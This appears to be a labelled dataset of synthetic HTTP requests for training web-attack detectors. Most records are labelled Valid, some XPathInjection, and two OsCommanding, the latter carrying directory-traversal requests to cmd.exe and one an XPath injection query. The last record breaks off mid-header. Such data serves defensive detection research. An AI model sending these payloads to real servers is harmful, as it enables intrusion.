Warning: 085 www.stl7an.jpeg "efnn" "Sat, 18 Aug 07 07:29:46 GMT"

null

End - Id: 40984
Start - Id: 2082
class: Valid
GET /jvqQM3kJd7c9u/u@aahq.ceF/OnAorIaHavapc/dnSnrTAx-kKbEJiYr/a7dEryq9lUEe2Bdiaeh6/c2isfAtEeltyTdsinec/swlslde7Gepot/anq/e3otqtatndyhQopis/afBjJIhBn/scriptPKHNhejinclude_Ddiv2-/orserm8gyks.nsf? HTTP/1.1
Host: 54.68.99.113
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=3436
Client-ip: 226.99.48.187
Cookie: whvinsert4081hgU=cmrde;oxo8dairrs=lese3dmeta8caccess_log;zO22o=n;e1-tenne1r
Cookie2: $Version="71"
Date: Thu, 02 Mar 06 15:16:51 CET
ETag: W/"F1Aq4YHuD905gC@1ct"
Expect: 100-continue
From: Iosu@aert5hd.ch
If-Modified-Since: Mon, 19 Mar 07 19:03:15 CET
If-Unmodified-Since: Tue, 07 Nov 06 17:44:27 UTC
If-Match: "aXB6LNuLzFqqz8O"
If-None-Match: *
If-Range: *
Max-Forwards: 414
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: NTLM dGFvYXRjYXVuZXR2bnBhaWdzaGVveXRyb284bE1jczdsZXJzNQ==
Range: -97
Referer: http://www.ajjv1osa.org/ekucstg.mpeg
TE: trailers,gzip
Trailer: TE
User-Agent: Mozilla/3.3 (X11; U; Unix 3.5; oi-ta; rv:9.6.5) Gecko/43977393
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9666x5160
Via: itxiol/8.3 www.slraso0.js, ewCzth/9.3 www.rihh3tjg.jpg
Transfer-Encoding: ycht4; tneQosdd=otlpaes
Upgrade: yq8/2.8, eehttw/5.0, dkosox/1.5, escije/5.1, snhtg/0.5
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 108.113.52.240
X-Serial-Number: 0933416903549
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2082
Start - Id: 48971
class: XPathInjection
GET /or3/dtfddesmag9du/rs/iv/add2mcow/eRj.swf?ec4aohii3srf=69+or++++1%3C++++q4c%2FtmAuh%2Fgwoih%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D97%5D+or+36302%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&.HOZ6ftpLPTTZx=jiNanosejccepoo HTTP/1.0
Host: 13.168.96.155
Connection: onmPeiie
Accept: */*;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: identity, deflate, compress;q=0.0, compress;q=0.6
Accept-Language: enerEer-w32, 3-sc, eno-teap, iszatt00-nytNica;q=0.3
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="23"
Date: Wed, 22 Feb 06 09:43:08 GMT
ETag: W/"jYHztclesekjaK2po0"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Tue, 01 Jan 08 08:42:04 UTC
If-Unmodified-Since: Fri, 05 Nov 04 17:39:07 UTC
If-Match: "FbroY8fbk.4kZOkT"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /suCueno/toa4lec/dtlbO/eaaSc.cfm
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.8 (compatible; hr4tn6m; Open BSD i586; h9nyy)
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 395x881
Via: 7.4 117.73.39.254
Transfer-Encoding: identity
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48971
Start - Id: 17250
class: Valid
GET /ab/edtdgtd4tWa/e43ayilnmnn/eYEnX8l/0cYnAFrl/mevnswddliete/tarrttnt95dgmEl22etf.asp? HTTP/1.0
Host: 75.98.250.171:80
Connection: close
Accept: image/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 195.153.27.209
Cookie: KkVn=bjlP;NhvtmVo=40;CperlhttpMyimgTr=aWrotheeh6twf;lTIe1elha9gd=54748;ybaigr0=9 update
Cookie2: $Version="9"
Date: Sun, 25 Mar 07 10:24:53 GMT
ETag: "S@@1nfvdPNmj48qVNstc"
Expect: s3sfseb9=eog84p;tHio0o=j0ta
From: ooeneIhr@zoriPoywEl.it
If-Modified-Since: Sat, 13 Dec 08 24:38:38 CET
If-Unmodified-Since: Thu, 19 Nov 09 06:23:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 16
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: Basic Y3Z3cjV3czQ6aTZjbmln
Range: -986,9134-
Referer: http://tvRdmu.st/araihi5/mhuno/4swS/zsoYgijo.nsf
TE: deflate,gzip,trailers
Trailer: Via
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 1.0; 4a-gE; rv:9.8.7) Gecko/59301822
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 425x7082
Via: HTTP/1.4 233.14.41.243, 7.1 90.233.193.34, 1.5 43.38.209.66
Transfer-Encoding: gzip
Upgrade: e7eli/6.7, 5Tued/6.2
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 835471798337
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17250
Start - Id: 11319
class: Valid
GET /eeiRodaevs/znM/tV61Njza017GUXMDE/n4pegtzDsyeElntcjacp/ecigj8Kst/0aFconnecthfyQo/d3iaIib/jservicesR6form.t/rha8ezwndi/sUdmkq8kW1wL-o@AsZ.shtml? HTTP/1.1
Host: 105.48.136.97:89176
Connection: oo4hsn
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e4etict-eN, mm-t, irxeir-heuuyt;q=0.7
Cache-Control: no-cache
Client-ip: 205.97.76.207
Cookie: 96nk2=th 1&aWt d1xmles[inm;f5lhueueoh=c;2th=$so
Cookie2: $Version="87"
Date: Sat, 28 Jan 06 07:59:15 UTC
ETag: "Ecv8ajRCP5OFkTLKb"
Expect: 100-continue
From: 4uewao@tP0n0beotn.fr
If-Modified-Since: Sun, 07 Jan 07 06:19:03 GMT
If-Unmodified-Since: Mon, 03 Dec 07 05:40:40 UTC
If-Match: *
If-None-Match: "hewFx8CnypgDMw8vR"
If-Range: Thu, 10 Nov 05 20:46:30 GMT
Max-Forwards: 9357
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest nc=7C5cC0b1
Authorization: Osta aeehqti=ce5r
Range: 536428-,-28681,5449-8638
Referer: http://www.fbm5W.fr/jatwee/edu8/mN2aMebp/usft/wTfaams.ace
TE: gzip;q=0.6
Trailer: Date
User-Agent: tYFxRoP http://www.emtmojf.it
UA-CPU: Sparc
UA-Disp: 8778,423,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x845
Via: 4.8 235.20.178.147, 4.9 www.odaAand.tiff:64342, HTTP/1.1 117.108.98.116
Transfer-Encoding: deflate
Upgrade: veer/3.0, d8snnM/4.8, nja/8.7, r8o/0.9
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11319
Start - Id: 8419
class: Valid
GET /3bOE/o9xogEC8-/to4rnotosrseb4dri/l5FoQevalZSZhtaccesFK9/t91aeQ96w3TyYrZ_.php3?ce=sN2KOM&W9-ICZwhereA_cwt=6694176616&selsiet=oWRu_0j4&auia=l5%5D+n&bTeae=%24l&WA4zuaiapeue=r4wsdEmeku0du0&mnDiodat=nuK_ibmO&yltheHgoazTnra=164447 HTTP/1.1
Host: www.unCoiSo.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, x-mac-ce;q=0.0
Accept-Encoding: deflate, compress;q=0.5, compress, compress
Accept-Language: *;q=0.2
Cache-Control: qio='hh'
Client-ip: 199.138.60.143
Cookie: 03kmsgaeRterh=sindpsupxt1;-rcpRJ=easprteiga P(;gcd5spe3eet=544491;a5rea7Uln9tisdi=n0euNt4fxwstm;sse1ahql=iosaan
Cookie2: $Version="94"
Date: Sat, 30 Apr 05 11:17:51 GMT
ETag: W/"zdRA7_VBu7wmbmZA"
Expect: 100-continue
From: 1eenbh@ie5isn9.org
If-Modified-Since: Fri, 27 Nov 09 18:30:49 UTC
If-Unmodified-Since: Tue, 28 Jun 05 03:17:37 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Nov 04 17:28:55 CET
Max-Forwards: 55
MIME-Version: 8.9
Pragma: qo3='twitrbt'
Proxy-Authorization: Basic cnJ0RURhWDpvdWV2bw==
Authorization: Basic cjRvc3VlOnpuaWk2RQ==
Range: 723917-,-6
Referer: http://www.hEyAiusu.st/oehmelZ/lrpTlfe/noueii/seeRid/aoaeteo.mdb
TE: deflate,trailers
Trailer: If-Match
User-Agent: aefstEnss (tpIgthEMQ)
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0740x492
Via: HTTP/0.7 169.99.125.168, 8.7 www.YmteuOr.jpeg, 4.2 65.157.9.43
Transfer-Encoding: ce2w5o
Upgrade: dvu6s/4.4
Warning: 357 99.135.65.27 "td6odiagrnr7lillcex" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8419
Start - Id: 44524
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.4netn.be
Connection: ehNo
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.8
Accept-Language: xHotn-c, uirbtB0-sgbygMeh
Cache-Control: max-age=3
Client-ip: 152.85.184.172
Cookie: Eadjaliet=e_uqTYYep;errndc9e=nVCKPxQ6OM;geH-RvR9=3567216;tfksitDnieRe=oJZ4kH05-h3
Cookie2: $Version="81"
Date: Fri, 20 Feb 04 02:07:52 GMT
ETag: "6.58tUusJo7_pzi8ZM"
Expect: 100-continue
From: bsntalu@ofn3s.de
If-Modified-Since: Sun, 28 Aug 05 22:59:44 GMT
If-Unmodified-Since: Tue, 22 Feb 05 09:31:00 GMT
If-Match: "pGZFIfOT8TyFeLk0oX"
If-None-Match: "x6gPbxb4VHViK_Zn9"
If-Range: Wed, 10 Dec 08 14:50:22 CET
Max-Forwards: 89
MIME-Version: 8.5
Pragma: 8ehmmhen='n'
Proxy-Authorization: NTLM dzRtb3JPZWRyZ2FlSVNwVWRpTG5hbWNvZXRjc2F0YkFhdXk3dXZj
Authorization: ienbeh ieerread=snqackgo
Range: 0-753213
Referer: http://www.p4Nwotzt.de/q6r6kn6/eopsscu/LEb1t9he.css
TE: trailers
Trailer: Warning
User-Agent: e67Ibr http://www.ln1r.gov
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 455x841
Via: FTP/9.6 www.skhe9z.gif, 7.3 242.169.186.234:3101
Transfer-Encoding: gzip
Upgrade: c3oe/1.8, sib/4.3, apenZ/1.3
Warning: 562 www.wrflneb.png "8rklJnrmoonx4" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 44524
Start - Id: 44394
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 177.157.19.24:8378
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.5, hz-gb-2312;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: 3syoo=ol
Client-ip: 11.102.57.129
Cookie: r4eessnsr=oeuhsiTs;esboageojd=038928
Cookie2: $Version="30"
Date: Fri, 30 Apr 04 22:28:29 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Sun, 01 Jan 06 10:45:43 UTC
If-Unmodified-Since: Fri, 04 Dec 09 17:53:33 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: NTLM bGVyYXNpZWVhdXRvZGFsUmU2aW5zN29VdE5vb2VvZXNSZXl0YXlhcw==
Range: 3952-044,25518-
Referer: /jiyeofh/rhtnZla.zip
TE: chunked;q=0.4
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.9 (compatible; csaDu7f; WinNT; tnorSmny)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: rspmf/0.1 www.omfma.png:74630, HTTP/2.8 3.126.114.224, 0.9 4.202.149.5
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 345 www.zdydE.js:508 "oogntaebhaEnWh" "Sat, 14 Oct 06 08:34:42 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44394
Start - Id: 15619
class: Valid
GET /cKho6/m_WN3Sz/AASJ3/bfouttnmjwctrai/N3Gwp-Vt0fmeta8Gq@vN/noeAZJ/fnpaXfuesKsahi/t9qVOXpClXI5/eB8ADRHtF53rKw8fK/Z66node/0yqApb-y.msf?X7UD=gntls&i_qzfhw2Pbgsound=3&7qocueo=aiELadldHb&tnryxnhnor=2757985&0mnoPTiieua=nEisc%7Et%25%5Bn%28&aechsszyr9e=hqi%29usrbdQ7hsock_streamgjij%3D&eUstbetEse=%25Ycrmuc6meanbsn&4h4niete=7&f4aeexnje=w8c&enenmiWeqen=27&qusjsnImihs=Rohtpass&@ePnU=19 HTTP/1.1
Host: 210.1.116.249
Connection: seisrld8
Accept: application/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 14.162.36.233
Cookie: ehyinpzh=0;ieonw=iQzU0Me;z0Worp=com8opddnnh
Cookie2: $Version="41"
Date: Tue, 06 Jul 04 01:17:01 CET
ETag: W/"12NQOr7jXUOXeYr"
Expect: 100-continue
From: tre3@eoezisahr.net
If-Modified-Since: Tue, 04 Oct 05 12:32:22 UTC
If-Unmodified-Since: Mon, 15 Feb 10 07:02:47 GMT
If-Match: "8zLLheUh0jZHxt@"
If-None-Match: "97Eo6IZoJZB5iq4_MhyT"
If-Range: "q2C1mlnkHiuSWiS.aOe_"
Max-Forwards: 002
MIME-Version: 4.4
Pragma: fie=edj
Proxy-Authorization: Basic bXR2Z24zOmx0NnI=
Authorization: zqOahe wydbn3n=eatg
Range: 3-,76842-90
Referer: http://www.swae.it/hnsorf.msf
TE: trailers,chunked
Trailer: User-Agent
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 4.8; ee-eR; rv:4.1.6) Gecko/82804144
UA-CPU: x86
UA-Disp: 435,816,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: bne8b/6.4 207.154.161.35, bta/0.3 170.53.124.136, 2.8 www.asiobv.html
Transfer-Encoding: identity
Upgrade: aih/4.7, ohs/5.1
Warning: 222 www.0iel.jpeg:95 "owrAeinasr5" 
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 15619
Start - Id: 1181
class: Valid
GET /hjvd/bbcyln/dsi6a/wTUA7nullqmTKI/tsVAHyM/rueshk2emmom/maeqr4I/ninheehjuetiuos.sh?yqnullo=n8mfIea6darniaIe&ad2ssst33=Hfovraitnisonol HTTP/1.0
Host: www.y531eira.de
Connection: keep-alive
Accept: text/*, image/*
Accept-Charset: big5, x-mac-arabic;q=0.9, x-mac-roman, windows-1251, cp-950
Accept-Encoding: 
Accept-Language: ssItdlf0-imsyN0, Hlre9o-v0dneow, peatnonc-7twdiod;q=0.8
Cache-Control: zi=iiin
Client-ip: 146.252.162.213
Cookie: 8ewaeizaei=re0 Rtndmnua;sidedonizis=eAJL77oeD;kRV5-F3B=56;san=onwnreanla
Cookie2: $Version="39"
Date: Sun, 08 Apr 07 17:51:51 UTC
ETag: "PDK5R1bFXa2W3huBM"
Expect: 100-continue
From: lotyd@3e47eeHm.it
If-Modified-Since: Thu, 25 Oct 07 11:40:19 GMT
If-Unmodified-Since: Sun, 09 Nov 08 09:41:21 CET
If-Match: "X0e1ZKloSYyPj0.W8q"
If-None-Match: "u2aL7R2ZdtjNqII"
If-Range: Wed, 25 May 05 05:14:38 GMT
Max-Forwards: 903
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: NTLM dDg3bmlmVGxidm5BdDFldm90ZUZhb3RlbHJhRGhpYTlrcXJlV2hkaGUzeW5ldA==
Authorization: Basic eXdubjc6dHJva2hzcA==
Range: -35236,31901-084
Referer: /xhtebs/egxn/resro3pi.gif
TE: deflate;q=0.4,chunked,trailers
Trailer: If-Modified-Since
User-Agent: rkegheja1eo
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5650x6286
Via: 8.0 246.198.37.108, s9N/8.1 221.19.83.63, HTTP/4.8 www.olool.jpg
Transfer-Encoding: gzip
Upgrade: trt/8.8
Warning: 664 236.240.179.234 "ldnr" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 83434025
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1181
Start - Id: 10642
class: Valid
GET /ingnr/eras/dC/o@Ya6rN4JQtYIUIJZ/lKFeohL4FjhX/te31opugck5oi4hritu9/Nst/qnP/XpD7xiD1Lexec.mspx?aG0RLta6ma=ePawM2osda&le2=6we&teclto9ldE=tiwSO&wagpntAlni=54&zoss=p0b&euioaqtclte1pN=ponusraalc&genunUf=vvJCOgvfpn9&MuOlroathnEh=81282115&D0DYopEIxw=oBomN_oE1&3tet=3&DL8wPNtsCxp_rH=808840 HTTP/1.1
Host: www.eethj.st
Connection: close
Accept: */*
Accept-Charset: iso-8859-6, x-mac-japanese;q=0.1, x-mac-hebrew;q=0.5, iso-8859-8;q=0.3, isiri-3342
Accept-Encoding: *
Accept-Language: w-yenh;q=0.4, i-SutkLrr;q=0.9, cuar-neartsu;q=0.8
Cache-Control: max-stale
Client-ip: 130.162.66.160
Cookie: apnfCgmyy=78
Cookie2: $Version="0"
Date: Tue, 18 Aug 09 23:13:19 CET
ETag: W/"6JAOVGGez7Ua0VcS"
Expect: 100-continue
From: NWe3sao@jneted7.de
If-Modified-Since: Wed, 05 Nov 08 03:47:29 CET
If-Unmodified-Since: Wed, 14 Feb 07 16:08:12 GMT
If-Match: "k59qDOp5p9FuamRRJRW"
If-None-Match: "ziPKAglFc6@SuwW"
If-Range: *
Max-Forwards: 703
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest response="FcF6f5Fc9A37e66cB49eaBB5B16af622"
Authorization: Digest algorithm=MD5-sess
Range: 6-0447,7686-38299,7705-
Referer: http://Aaqtu.com/ttIiwx/ohpton/ddeny.tar.gz
TE: trailers
Trailer: Proxy-Authorization
User-Agent: cUsel/9.0.8
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7494x790
Via: 6.9 196.202.208.154, 2.4 www.a5b2w.jpeg:433
Transfer-Encoding: deflate
Upgrade: esd8yb/3.6, ebr7u/3.4, gieesh/7.2, iqtelo/1.1, oAp/5.7
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10642
Start - Id: 18990
class: Valid
GET /heoeaisitsrwithtnop/C-Hhs6CN25/eaM/lux/rad1L/aGAhome.7mP/egyJosfsnnim/cC7T/.0Ws/Laijbody8.asp?ht1umwBrtrep=yjogc&lfdmneeeitbrte=71500947&abosmneolxeyc=neu&021Tbody5=83440&ey4siema=Ecimailt+oe%3Asho7a&NVQpe=eeD0NHL89&g9netcat-CY2mwLor_=aoue54Tafm&zh1F=38&4rownl5=6498223303&b4t7=%28&llreee6id=passwd%3Bs%5CeEl%24+woptMp&LxBinputMASM=waUe HTTP/1.0
Host: www.nehwrerq.it:80
Connection: atniyoo
Accept: video/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: sssm-h8E
Cache-Control: only-if-cached
Client-ip: 103.87.128.39
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="10"
Date: Thu, 26 May 05 05:09:25 UTC
ETag: W/"GVWaA9DCuXqqqJrb"
Expect: s0roy7=mAGvNo;ttbher=aamM
From: l14gyjst@isddra.be
If-Modified-Since: Sat, 03 Apr 04 16:00:14 GMT
If-Unmodified-Since: Sat, 22 Aug 09 16:23:42 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 12 Jul 04 18:08:13 CET
Max-Forwards: 793
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 5xRae onteCdsi=onReodh
Authorization: Digest username="n5leeaKr"
Range: 2800-0168
Referer: /Tzar/tbsthnn/estwn/ere8u.mspx
TE: deflate,trailers,deflate;q=0.5
Trailer: Host
User-Agent: Mozilla/5.7 (X11; U; Unix 6.0; ir-wn; rv:1.4.0) Gecko/97566866
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: HTTP/2.0 www.8atr.gif
Transfer-Encoding: ulxe; ncrci2aa=bO5wd
Upgrade: enfzlm/9.3, RMow/0.2, Fmr1/3.8, tsi/2.4, pil2/2.5
Warning: 384 www.ihOsnx.gif:86157 "3mwtkhlueagtttZwo" 
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18990
Start - Id: 11564
class: Valid
GET /orqasCENqzKUtk/bintiT9_opositionmIgrqSk/9iY1dq.sh?c8rHyoq=sCb51&nc=9tblAnEtawn&7ohrRxsh=415&ds=95096759&4LhU=2983&ce=610791&9rn7nsrhEIiaii=523469&0coKotoNrf=pC6goIvkFY&djrSa2q1enRil=s&pInStcohihn=bcI&eRtdlnnti=abo01dn&dc=miit4uwindow.opentv+ HTTP/1.1
Host: www.oplmts0.uk:6979
Connection: keep-alive
Accept: image/png;q=0.4, application/*;q=0.5, video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=8
Client-ip: 252.179.56.242
Cookie: ZLO5F=812509;2ndntlery4m=yallmhAhecsr+l
Cookie2: $Version="6"
Date: Sun, 01 Jan 06 09:11:15 UTC
ETag: "6kKejnXPOeRQZgBYU6o"
Expect: 100-continue
From: teo4@aUbrofle.com
If-Modified-Since: Mon, 15 Sep 08 12:08:16 CET
If-Unmodified-Since: Wed, 17 Feb 10 04:12:10 GMT
If-Match: "ye@FW9GtC.1iUEPT"
If-None-Match: *
If-Range: Fri, 11 Jan 08 07:42:33 GMT
Max-Forwards: 4667
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic NmxzcmV5ODpvN2d0Tw==
Authorization: Basic Qm9qSDd0ZTppcHNuZQ==
Range: 8415-02061,-38088
Referer: /dUc3/rtAgano/hfepn.swf
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/3.8 (compatible; dnsr; WinNT; iyse; fomdf; 1ertdvasei)
UA-CPU: 68000
UA-Disp: 714,2257,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x168
Via: 4.0 www.ji3esM.png, HTTP/2.7 www.sdSEiihZ.tiff
Transfer-Encoding: compress
Upgrade: coz/2.2, taglnO/9.0, cttDo/4.2, taie/2.4
Warning: 655 24.129.249.203 "tyroj4er3ouraNtrCo" 
X-Forwarded-For: 167.33.149.198
X-Serial-Number: 24189
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11564
Start - Id: 25293
class: Valid
GET /ob/iteeitbeO2soEoiooIee/w2PjjLV/mQE/ae7/eSlAeesi.shtml? HTTP/1.1
Host: www.Sceei.net
Connection: vinoct7r
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: max-age=0537
Client-ip: 103.126.32.237
Cookie: Iotoredo7z1sfio=Dtnpe;l0eperv=2204751764;lbg8frbQcwa=35QLHIg
Cookie2: $Version="74"
Date: Thu, 12 Aug 04 22:20:32 GMT
ETag: W/"u1nR_3pFCSqH8kdr"
Expect: 9b3i
From: 24aerft@sentpste.de
If-Modified-Since: Wed, 20 Sep 06 08:32:55 UTC
If-Unmodified-Since: Thu, 28 Apr 05 03:54:07 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 25 May 04 08:15:23 GMT
Max-Forwards: 2
MIME-Version: 9.9
Pragma: efdofrt3=kio2
Proxy-Authorization: iDor bidltu6W=esnn
Authorization: iawse nntopa=sDjjar
Range: 69-01
Referer: http://bl4E43.com/bil4ica/sebd/cxduaymi/d4d7w.asmx
TE: chunked;q=0.3,trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (X11; U; Solaris 7.7; sx-un; rv:8.1.5) Gecko/20815400
UA-CPU: Sparc
UA-Disp: 8204,1865,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9336x783
Via: 6.0 128.235.105.106, ersn/1.7 www.eaedelfh.html, yqR2k7/3.1 113.170.48.75
Transfer-Encoding: deflate
Upgrade: etyus/9.6, FnEerp/9.4, qQuoro/7.9, obf/9.5, eMg/5.1
Warning: 776 www.rdYxT.js:39275 "ktn2Rsp3eeodnxlt1dmc" "Sat, 28 Jun 08 20:23:50 UTC"
X-Forwarded-For: 57.51.182.235
X-Serial-Number: 139373036597408522
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25293
Start - Id: 19714
class: Valid
GET /oWzO@.jpg?netatc7as1sihri=oVghn7IBw5o&anrfkeuxpl=6&ptsbhutuobhqia=9405511&E9scriptsystemautoexecMrwinnt3Srt=tasuuV&kwbeoctzq3fc2Eh=a%3D&tn1fbNr=ei+h+pnueeoD%26oz&e0eaY=h%24%3Clt&igoot=dU9S%407D-k4UW&rtS=729027297&fW1sHj=aei&nxT5IIbAD=oaioadr2oglikeaccess_log%40+h&nnuwahnht1aA=r%3DenEutse&Vwinnt3Plocation0Z=dj&ajxS=tro%2BqdEtvst&Y8grQyKRAyt=rvl HTTP/1.0
Host: www.ibsn.it
Connection: keep-alive
Accept: video/quicktime, application/x-tar, video/*
Accept-Charset: x-mac-icelandic;q=0.4, x-mac-chinesesimp, x-mac-chinesetrad;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 184.121.99.71
Cookie: Tid7rvr=763;ieoodBkpteu2rOo=eEqiBu;kzntqcnsoeri=77289
Cookie2: $Version="61"
Date: Thu, 14 Sep 06 19:10:01 CET
ETag: W/"Rkb98hahz3bFd92n3c"
Expect: eahee
From: moea@estmzx.uk
If-Modified-Since: Mon, 06 Jul 09 02:37:28 GMT
If-Unmodified-Since: Sun, 26 Apr 09 16:23:22 GMT
If-Match: "Nqab3YUS-jgHzjyFAP"
If-None-Match: *
If-Range: "9Cqx.W8g6h4eS9Jn"
Max-Forwards: 25
MIME-Version: 5.3
Pragma: tn1=bpgWR
Proxy-Authorization: Digest nc=44bDedBC
Authorization: srYn weuaaas=pnoYtea
Range: 71657-893
Referer: http://www.itnposin.be/Tnpbhsl/lo1jhtdd/yafwlu/mdlorlp/haoo.cgi
TE: trailers,deflate;q=0.5,trailers
Trailer: Date
